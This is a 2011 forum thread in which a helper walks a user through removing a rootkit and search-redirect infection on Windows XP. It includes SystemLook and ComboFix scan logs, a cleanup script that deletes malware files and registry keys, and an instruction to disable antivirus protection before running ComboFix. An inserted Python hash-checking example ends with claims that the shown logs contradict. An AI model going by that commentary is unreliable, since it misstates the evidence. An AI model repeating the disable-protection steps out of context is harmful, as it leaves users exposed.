Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 12th, 2011, 3:49 am

Hi


It looks like we've identified the culprit.



SystemLook

Please download SystemLook from one of the links below and save it to your Desktop.

Download Mirror #1
Download Mirror #2


  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :filefind
    volsnap.* 
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
melboy
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 12th, 2011, 9:08 am

Hi -

I ran SystemLook - results below.

SystemLook 04.09.10 by jpshortstuff
Log created at 08:50 on 12/06/2011 by admin
Administrator - Elevation successful

========== filefind ==========

Searching for "volsnap.* "
C:\i386\volsnap.inf --a---- 1095 bytes [11:28 02/08/2005] [10:00 04/08/2004] 1C43F4D998567C9D2463E18669F33A3C
C:\i386\volsnap.sys --a---- 52352 bytes [11:32 02/08/2005] [10:00 04/08/2004] EE4660083DEBA849FF6C485D944B379B
C:\WINDOWS\inf\volsnap.inf --a---- 1095 bytes [17:51 10/08/2004] [10:00 04/08/2004] 1C43F4D998567C9D2463E18669F33A3C
C:\WINDOWS\inf\volsnap.PNF --a---- 4964 bytes [20:37 15/07/2005] [20:37 15/07/2005] 27C1FA3BF24995D0C1B24299E953820C
C:\WINDOWS\ServicePackFiles\i386\volsnap.sys ------- 52352 bytes [06:42 15/08/2009] [04:11 14/04/2008] 4C8FCB5CC53AAB716D810740FE59D025
C:\WINDOWS\SoftwareDistribution\Download\e9500597a78495f397efb821e37bf356\volsnap.sys --a---- 52352 bytes [18:41 13/04/2008] [18:41 13/04/2008] 4C8FCB5CC53AAB716D810740FE59D025
C:\WINDOWS\system32\drivers\volsnap.sys --a---- 52352 bytes [04:39 15/08/2009] [04:11 14/04/2008] 4C8FCB5CC53AAB716D810740FE59D025

-= EOF =-
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am
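One way to automate the comparison melboy is making with the SystemLook output above, added here as an example rather than code from the thread or from SystemLook itself; the line format comes from the log, while the hashes and the second driver in the sample are constructed:

```python
"""Check driver copies listed by SystemLook's ':filefind' command.

Added example for this thread; it is not SystemLook's own code. The line
format is the one in the log posted above:

    <path> <attrs> <size> bytes [<modified>] [<created>] <MD5>

The live driver under system32\\drivers is compared with the copy Windows
keeps under ServicePackFiles\\i386. The plain i386 copy is NOT used as the
reference because it predates the installed service pack and legitimately
differs. Hashes and the second driver in SAMPLE_LOG are constructed.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<path>.+?)\s+"             # full path; may contain spaces
    r"(?P<attrs>[-a-zA-Z]{7})\s+"    # attribute flags, e.g. --a---- or -------
    r"(?P<size>\d+) bytes\s+"
    r"\[(?P<modified>[^\]]+)\]\s+"   # [HH:MM DD/MM/YYYY] last modified
    r"\[(?P<created>[^\]]+)\]\s+"    # [HH:MM DD/MM/YYYY] created
    r"(?P<md5>[0-9A-Fa-f]{32})$"
)

LIVE_DIR = "\\system32\\drivers\\"            # copy actually loaded at boot
REFERENCE_DIR = "\\servicepackfiles\\i386\\"  # backup matching the installed SP

# Constructed sample in the SystemLook format; hashes are placeholders and
# testdrv.sys is an invented driver whose live copy has been altered.
SAMPLE_LOG = r"""
SystemLook 04.09.10 by jpshortstuff
Log created at 08:50 on 12/06/2011 by admin
Administrator - Elevation successful

========== filefind ==========

Searching for "volsnap.* "
C:\i386\volsnap.sys --a---- 52352 bytes [11:32 02/08/2005] [10:00 04/08/2004] 11111111111111111111111111111111
C:\WINDOWS\ServicePackFiles\i386\volsnap.sys ------- 52352 bytes [06:42 15/08/2009] [04:11 14/04/2008] 22222222222222222222222222222222
C:\WINDOWS\system32\drivers\volsnap.sys --a---- 52352 bytes [04:39 15/08/2009] [04:11 14/04/2008] 22222222222222222222222222222222

Searching for "testdrv.* "
C:\WINDOWS\ServicePackFiles\i386\testdrv.sys ------- 40960 bytes [06:42 15/08/2009] [04:11 14/04/2008] 33333333333333333333333333333333
C:\WINDOWS\system32\drivers\testdrv.sys --a---- 40960 bytes [09:17 02/06/2011] [04:11 14/04/2008] 44444444444444444444444444444444

-= EOF =-
"""


def parse_filefind(text):
    """Return one dict per result line; headers and the EOF marker are skipped."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        e = m.groupdict()
        e["size"] = int(e["size"])
        e["md5"] = e["md5"].upper()
        e["name"] = e["path"].rsplit("\\", 1)[-1].lower()
        entries.append(e)
    return entries


def compare_live_to_reference(entries):
    """Map each driver name to 'match', 'MISMATCH', 'no reference copy'
    or 'no live copy', comparing MD5 and size of the system32\\drivers copy
    against the ServicePackFiles\\i386 copy."""
    by_name = defaultdict(dict)
    for e in entries:
        p = e["path"].lower()
        if LIVE_DIR in p:
            by_name[e["name"]]["live"] = e
        elif REFERENCE_DIR in p:
            by_name[e["name"]]["ref"] = e
    verdicts = {}
    for name, copies in by_name.items():
        live, ref = copies.get("live"), copies.get("ref")
        if live is None:
            verdicts[name] = "no live copy"
        elif ref is None:
            verdicts[name] = "no reference copy"
        elif live["md5"] == ref["md5"] and live["size"] == ref["size"]:
            verdicts[name] = "match"
        else:
            verdicts[name] = "MISMATCH"
    return verdicts


if __name__ == "__main__":
    for name, verdict in compare_live_to_reference(parse_filefind(SAMPLE_LOG)).items():
        print(f"{name}: {verdict}")
```

A matching on-disk hash is necessary but not sufficient: this thread itself shows volsnap.sys hashing identically in every location while Rootkit Unhooker flagged the driver as modified in memory, which is why the disk check is paired with in-memory scanners.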

Re: redirected searches and email problems

Unread postby melboy » June 12th, 2011, 2:41 pm

Hi

Good. Please initiate yourself with the running of Combofix. Combofix may find rootkit activity & require your computer to be rebooted - maybe more than once.

Above all, please be patient and let combofix run its course.


ComboFix (by sUBs)

Please visit this webpage for instructions for downloading and running ComboFix: Bleeping Computer ComboFix Tutorial

  • You must download it to and run it from your Desktop
  • Now STOP all your security applications (Antivirus/Antispyware, Guards and Shields) as they could easily interfere with ComboFix.
    For instructions on how to disable your security programs, please see this topic:
    How to disable your security applications
  • Double click combofix.exe & follow the prompts.
  • When finished, it will produce a log. Please save that log to post in your next reply
  • Re-enable all the programs that were disabled during the running of ComboFix.


A word of warning: This tool is not for everyday use. ComboFix SHOULD NOT be used unless requested by a forum helper.
Neither I nor sUBs are responsible for any damage you may have caused your machine by running ComboFix on your own.
melboy
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 13th, 2011, 2:34 am

Hi -

I ran ComboFix as requested - the log file is attached.


ComboFix 11-06-12.03 - admin 06/13/2011 1:51.3.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.510.264 [GMT -4:00]
Running from: c:\documents and settings\admin\Desktop\ComboFix.exe
.
ADS - WINDOWS: deleted 128 bytes in 1 streams.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\biblespeak\BibleSpeak.exe
c:\documents and settings\admin\0.15188298399276234.exe
c:\documents and settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}
c:\documents and settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome.manifest
c:\documents and settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome\content\_cfg.js
c:\documents and settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome\content\overlay.xul
c:\documents and settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\install.rdf
c:\documents and settings\admin\WINDOWS
c:\documents and settings\All Users\Application Data\Tarma Installer
c:\documents and settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\_Setup.dll
c:\documents and settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.dat
c:\documents and settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.exe
c:\documents and settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.ico
c:\documents and settings\LocalService\Application Data\02000000f71535641270C.manifest
c:\documents and settings\LocalService\Application Data\02000000f71535641270O.manifest
c:\documents and settings\LocalService\Application Data\02000000f71535641270P.manifest
c:\documents and settings\LocalService\Application Data\02000000f71535641270S.manifest
c:\windows\ST6UNST.000
c:\windows\stic1690.exe
c:\windows\system32\ativtmxx32.dll
c:\windows\system32\ESQULzxspectrum
c:\windows\system32\GoogleToolbarInstaller_en.exe
.
Infected copy of c:\windows\system32\drivers\volsnap.sys was found and disinfected
Restored copy from - Kitty had a snack :p
.
((((((((((((((((((((((((( Files Created from 2011-05-13 to 2011-06-13 )))))))))))))))))))))))))))))))
.
.
2011-06-10 13:07 . 2011-06-12 12:59 -------- d-----w- C:\@malware
2011-06-10 13:07 . 2011-06-10 13:07 0 ---ha-w- c:\documents and settings\admin\aarexiymqh.tmp
2011-06-10 04:29 . 2011-06-10 04:29 785920 ----a-w- c:\windows\system32\bad ils32.exe
2011-06-10 04:29 . 2011-06-10 04:29 168960 ----a-w- c:\windows\system32\bad kbdycl32.dll
2011-06-10 04:29 . 2011-06-10 04:29 785920 ----a-w- c:\windows\system32\bad dfshim32.exe
2011-06-10 04:29 . 2011-06-10 04:29 359424 ----a-w- c:\windows\system32\bad ativtmxx32.dll
2011-06-07 11:47 . 2011-06-07 11:47 -------- d-----w- c:\documents and settings\admin\Application Data\AVG10
2011-06-07 11:36 . 2011-06-07 11:36 -------- d--h--w- c:\documents and settings\All Users\Application Data\Common Files
2011-06-07 11:32 . 2011-06-08 14:00 -------- d-----w- c:\documents and settings\All Users\Application Data\AVG10
2011-06-07 11:32 . 2011-06-08 13:58 -------- d-----w- c:\windows\system32\drivers\AVG
2011-06-07 11:31 . 2011-06-07 11:31 -------- d-----w- c:\program files\AVG
2011-06-07 11:24 . 2011-06-08 13:59 -------- d-----w- c:\documents and settings\All Users\Application Data\MFAData
2011-06-06 17:09 . 2011-06-08 14:17 -------- d-----w- c:\documents and settings\All Users\Application Data\AVAST Software
2011-06-06 17:09 . 2011-06-06 17:09 -------- d-----w- c:\program files\AVAST Software
2011-06-06 16:57 . 2011-06-06 17:04 -------- d-----w- c:\program files\SpywareBlaster
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2011-06-05 13:16 . 2011-06-05 13:16 -------- d-----w- c:\documents and settings\admin\Application Data\SUPERAntiSpyware.com
2011-06-05 13:15 . 2011-06-05 13:16 -------- d-----w- c:\program files\SUPERAntiSpyware
2011-06-05 07:45 . 2011-06-06 04:57 -------- d-----w- c:\program files\Spybot - Search & Destroy
2011-06-04 16:32 . 2011-06-04 16:32 -------- d-----w- c:\program files\Watchtower
2011-06-04 15:19 . 2011-06-04 15:19 -------- d-----w- c:\windows\system32\wbem\Repository
2011-06-04 14:15 . 2011-06-04 18:56 -------- d-----w- C:\- PDF docs
2011-06-04 14:15 . 2011-06-04 15:15 -------- d-----w- C:\- maps
2011-06-04 13:55 . 2011-06-04 14:04 -------- d-----w- C:\- JW info
2011-06-04 13:55 . 2011-06-04 18:55 -------- d-----w- C:\- money
2011-06-04 13:55 . 2011-06-04 13:55 -------- d-----w- C:\- bank
2011-06-04 13:55 . 2011-06-04 18:57 -------- d-----w- C:\- XL docs
2011-06-04 13:55 . 2011-06-04 19:28 -------- d-----w- C:\- word docs
2011-06-04 13:54 . 2011-06-04 18:51 -------- d-----w- C:\- sounds
2011-06-04 13:53 . 2011-06-04 19:07 -------- d-----w- C:\- powerpoint
2011-05-16 13:45 . 2011-05-16 13:45 7040 ----a-w- c:\windows\system32\sabprocenum.sys
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-06-04 16:09 . 2011-03-22 17:14 107 ----a-w- c:\documents and settings\admin\Application Data\netstat.bat
2011-05-29 13:11 . 2009-09-04 13:59 39984 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{A1E75A0E-4397-4BA8-BB50-E19FB66890F4}"= "c:\program files\MyAshampoo\tbMyA1.dll" [2010-08-21 2734688]
.
[HKEY_CLASSES_ROOT\clsid\{a1e75a0e-4397-4ba8-bb50-e19fb66890f4}]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"HideShutdownScripts"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"NoResolveTrack"= 0 (0x0)
"NoFileAssociate"= 0 (0x0)
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21 548352 ----a-w- c:\program files\SUPERAntiSpyware\SASWINLO.DLL
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^PolderbitS Audio Driver Monitor.lnk]
backup=c:\windows\pss\PolderbitS Audio Driver Monitor.lnkCommon Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cdloader]
2010-12-03 12:39 50592 ----a-w- c:\documents and settings\admin\Application Data\mjusbsp\cdloader2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
2008-04-14 09:42 15360 ------w- c:\windows\system32\ctfmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2010-02-15 23:50 417792 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SpybotSD TeaTimer]
2009-03-05 20:07 2260480 --sha-w- c:\program files\Spybot - Search & Destroy\TeaTimer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2011-05-23 15:00 2424192 ----a-w- c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2010-10-02 15:51 202256 ----a-w- c:\program files\Common Files\Real\Update_OB\realsched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"LiveUpdate Notice Service"=3 (0x3)
"LiveUpdate Notice Ex"=3 (0x3)
"LiveUpdate"=3 (0x3)
"Automatic LiveUpdate Scheduler"=2 (0x2)
"AntiVirService"=2 (0x2)
"AntiVirSchedulerService"=2 (0x2)
"wuauserv"=2 (0x2)
"SBAMSvc"=2 (0x2)
"Browser Defender Update Service"=2 (0x2)
"avast! Antivirus"=2 (0x2)
"WMPNetworkSvc"=3 (0x3)
"VSS"=3 (0x3)
"SysmonLog"=3 (0x3)
"ose"=3 (0x3)
"odserv"=3 (0x3)
"nlsX86cc"=2 (0x2)
"idsvc"=3 (0x3)
"gupdatem"=3 (0x3)
"gupdate"=2 (0x2)
"DfSdkS"=3 (0x3)
"Apple Mobile Device"=3 (0x3)
"SBPIMSvc"=2 (0x2)
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\WINDOWS\\system32\\sessmgr.exe"=
"c:\\Program Files\\Skype\\Plugin Manager\\skypePM.exe"=
"c:\\Program Files\\Skype\\Phone\\Skype.exe"=
"c:\\mjusbsp\\magicJack.exe"=
"c:\\Program Files\\Parsons\\QuickVerse\\QuickVerse\\qvwin.exe"=
"c:\\Documents and Settings\\admin\\Application Data\\mjusbsp\\magicJack.exe"=
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"5060:UDP"= 5060:UDP:UDP
"5070:UDP"= 5070:UDP:UDP
"49152:UDP"= 49152:UDP:UDP
"65535:UDP"= 65535:UDP:UDP
"443:TCP"= 443:TCP:TCP
.
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [2/17/2010 2:25 PM 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [5/10/2010 2:41 PM 67656]
R3 CAM1690;USB PC Camera;c:\windows\system32\drivers\cam1690.sys [9/20/2007 6:03 PM 181888]
R3 PbsAuDrv;PolderbitS Audio Driver;c:\windows\system32\drivers\pbsaudrv.sys [8/1/2009 1:17 PM 110752]
R3 RRNetCapMP;RRNetCapMP;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [9/4/2009 9:59 AM 366640]
S2 SamSs32;Security Accounts Manager ;c:\windows\system32\dfshim32.exe --> c:\windows\system32\dfshim32.exe [?]
S3 ADM8511;ADMtek ADM8511/AN986 USB To Fast Ethernet Converter;c:\windows\system32\drivers\ADM8511.SYS [7/26/2005 6:19 PM 20160]
S3 cpuz130;cpuz130;\??\c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys --> c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys [?]
S3 ionwpvvc;Watchport/V2 USB Camera;c:\windows\system32\drivers\ionwpvvc.sys [2/20/2008 4:50 PM 38656]
S3 MBAMProtector;MBAMProtector;\??\c:\windows\system32\drivers\mbam.sys --> c:\windows\system32\drivers\mbam.sys [?]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [9/4/2009 9:59 AM 39984]
S3 nosGetPlusHelper;getPlus(R) Helper 3004;c:\windows\System32\svchost.exe -k nosGetPlusHelper [8/15/2009 12:39 AM 14336]
S3 RRNetCap;RRNetCap Service;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S4 Compass Server;Compass Server; [x]
S4 DfSdkS;Defragmentation-Service;c:\program files\Ashampoo\Ashampoo WinOptimizer 7\DfSdkS.exe [4/13/2011 1:16 PM 406016]
S4 gupdate;Google Update Service (gupdate);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 gupdatem;Google Update Service (gupdatem);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 magicJack;magicJack;c:\mjusbsp\srvany.exe [2/27/2011 5:32 PM 8192]
S4 nlsX86cc;NLS Service;c:\windows\system32\NLSSRV32.EXE --> c:\windows\system32\NLSSRV32.EXE [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
getPlusHelper REG_MULTI_SZ getPlusHelper
nosGetPlusHelper REG_MULTI_SZ nosGetPlusHelper
.
Contents of the 'Scheduled Tasks' folder
.
2011-06-07 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-19 14:04]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Connection Wizard,ShellNext = iexplore
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
Trusted Zone: magicjack.com\my
Trusted Zone: talk4free.com\reg
TCP: DhcpNameServer = 192.168.0.1
TCP: Interfaces\{F1AACA3A-E5BE-452E-9F2E-0E4D30CBE236}: NameServer = 67.90.152.122,67.107.71.186
.
- - - - ORPHANS REMOVED - - - -
.
BHO-{1022D5BC-11EA-4BBF-8735-DBD28E5359Bc} - c:\windows\system32\ativtmxx32.dll
BHO-{17CC8F5E-78E0-AD0B-6459-5D135F28F580} - c:\windows\system32\kbdycl32.dll
BHO-{2045AB79-11EA-4BBF-8735-DBD28E5359Bc} - c:\windows\system32\ativtmxx32.dll
Toolbar-Locked - (no file)
Toolbar-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
WebBrowser-{D4027C7F-154A-4066-A1AD-4243D8127440} - (no file)
WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
MSConfigStartUp-Adobe ARM - c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
MSConfigStartUp-Adobe Reader Speed Launcher - c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe
MSConfigStartUp-AVG_TRAY - c:\program files\AVG\AVG10\avgtray.exe
MSConfigStartUp-DriverScanner - c:\program files\Uniblue\DriverScanner\launcher.exe
MSConfigStartUp-ISTray - c:\program files\Spyware Doctor\pctsTray.exe
MSConfigStartUp-SBAMTray - c:\program files\Sunbelt Software\VIPRE\SBAMTray.exe
AddRemove-ISA_CLV_module - c:\docume~1\ALLUSE~1\APPLIC~1\TARMAI~1\{00270~1\Setup.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2011-06-13 02:00
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
[HKEY_LOCAL_MACHINE\System\ControlSet009\Services\ASFWHide]
"ImagePath"="\??\c:\docume~1\admin\LOCALS~1\Temp\ASFWHide"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
[HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{2B8DA90D-0FD0-9EC6-D03B-B72F1EA63631}*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
[HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{701AE01E-57DC-62B6-726A-E623E013E9AB}*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
"oaofebfcooaennmldimllfnpkdeddk"=hex:64,61,6c,6c,6c,6f,68,6b,00,85
"oakeeiafbknjlbdpdmhbjhfdcampmp"=hex:6a,61,6c,6c,61,70,63,6a,65,70,70,6b,6e,61,
64,66,67,6d,6c,6b,00,0f
"naafkghclfiefjbaphoacnjbhlmk"=hex:6a,61,6f,6c,70,6f,63,6b,70,67,67,69,70,65,
67,67,63,64,67,65,00,07
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'winlogon.exe'(912)
c:\program files\SUPERAntiSpyware\SASWINLO.DLL
c:\windows\system32\WININET.dll
.
Completion time: 2011-06-13 02:03:33
ComboFix-quarantined-files.txt 2011-06-13 06:03
.
Pre-Run: 58,284,859,392 bytes free
Post-Run: 58,400,997,376 bytes free
.
WindowsXP-KB310994-SP2-Home-BootDisk-ENU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
UnsupportedDebug="do not select this" /debug
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Home Edition" /noexecute=optin /fastdetect
.
Current=9 Default=9 Failed=8 LastKnownGood=10 Sets=1,2,3,4,5,6,7,8,9,10
- - End Of File - - 7F68AA6BFA265A3A290E8984086C5C14
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Post by melboy » June 13th, 2011, 2:46 pm

Hi

A few questions for you to answer please.

Hows the computer running? Have the redirects stopped?

Did you create this folder on your C: drive?
C:\@malware

After running the CFScript below, please navigate to the Qoobox folder at the root of your C: drive and post the contents of ComboFix-quarantined-files.txt, along with the resulting ComboFix.txt
(C:\Qoobox\ComboFix-quarantined-files.txt)



COMBOFIX-Script

A word of warning: Please do not run ComboFix on your own. This tool is not a toy and not for everyday use.

If combofix prompts you that an update is available, please allow it to update.


  • Please open Notepad (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the code box below:

    File:: 
    c:\documents and settings\admin\aarexiymqh.tmp
    c:\windows\system32\bad ils32.exe
    c:\windows\system32\bad kbdycl32.dll
    c:\windows\system32\bad dfshim32.exe
    c:\windows\system32\bad ativtmxx32.dll
    
    DirLook::
    C:\@malware
    
    Driver:: 
    SamSs32
    
    Regnull::
    [HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{2B8DA90D-0FD0-9EC6-D03B-B72F1EA63631}*]
    [HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{701AE01E-57DC-62B6-726A-E623E013E9AB}*]
    

  • Save this as CFScript.txt and change the "Save as type" to "All Files" and place it on your desktop.

    (screenshot not reproduced here)
  • Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before following the steps below. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
  • If you need help to disable your protection programs see here.
  • Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
  • ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
  • When finished, it shall produce a log for you. Copy and paste the contents of the log in your next reply.

CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.
melboy
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Post by ard » June 13th, 2011, 5:49 pm

Hi –

question - 1
The computer runs OK for the most part. Almost every email is preceded by a box saying –
c:documents and settings\dadmin\desktop
 ___________________________________________________________________
| flash required for this application                             x |
|-------------------------------------------------------------------|
| Your browser must have Flash 9.0 or higher installed to add this  |
| application. You can download and install the latest Flash Player |
| here                                                              |
|                                                                   |
|                                OK                                 |
|___________________________________________________________________|


The email display is very slow to display.



question - 2

I created the directory c:\@malware to hold the anti-malware exe’s and logs so they wouldn’t be lost to me.

I also added the (bad ) prefix to these files because they kept trying to run in the Task Manager - that was before I talked with you.

c:\windows\system32\bad ils32.exe
c:\windows\system32\bad kbdycl32.dll
c:\windows\system32\bad dfshim32.exe
c:\windows\system32\bad ativtmxx32.dll


number - 3

I ran ComboFix. During stage 2 or 3 XP showed a box - PEV.exe has encountered a problem and must close, etc. etc. etc., send report or don’t send.

I did nothing.



LOG.TXT

ComboFix 11-06-13.01 - admin 06/13/2011 16:51:44.4.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.510.282 [GMT -4:00]
Running from: c:\documents and settings\admin\Desktop\ComboFix.exe
Command switches used :: c:\documents and settings\admin\Desktop\CFScript.txt
AV: AntiVir Desktop *Disabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
.
FILE ::
"c:\documents and settings\admin\aarexiymqh.tmp"
"c:\windows\system32\bad ativtmxx32.dll"
"c:\windows\system32\bad dfshim32.exe"
"c:\windows\system32\bad ils32.exe"
"c:\windows\system32\bad kbdycl32.dll"
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\admin\aarexiymqh.tmp
c:\windows\system32\bad ativtmxx32.dll
c:\windows\system32\bad dfshim32.exe
c:\windows\system32\bad ils32.exe
c:\windows\system32\bad kbdycl32.dll
.
.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Legacy_SAMSS32
-------\Service_SamSs32
.
.
((((((((((((((((((((((((( Files Created from 2011-05-13 to 2011-06-13 )))))))))))))))))))))))))))))))
.
.
2011-06-13 06:11 . 2011-06-13 06:11 -------- d-----w- c:\documents and settings\All Users\Application Data\Avira
2011-06-13 06:11 . 2011-04-01 21:07 61960 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2011-06-13 06:11 . 2011-04-01 21:07 137656 ----a-w- c:\windows\system32\drivers\avipbb.sys
2011-06-13 06:11 . 2010-06-17 19:27 45416 ----a-w- c:\windows\system32\drivers\avgntdd.sys
2011-06-13 06:11 . 2010-06-17 19:27 22360 ----a-w- c:\windows\system32\drivers\avgntmgr.sys
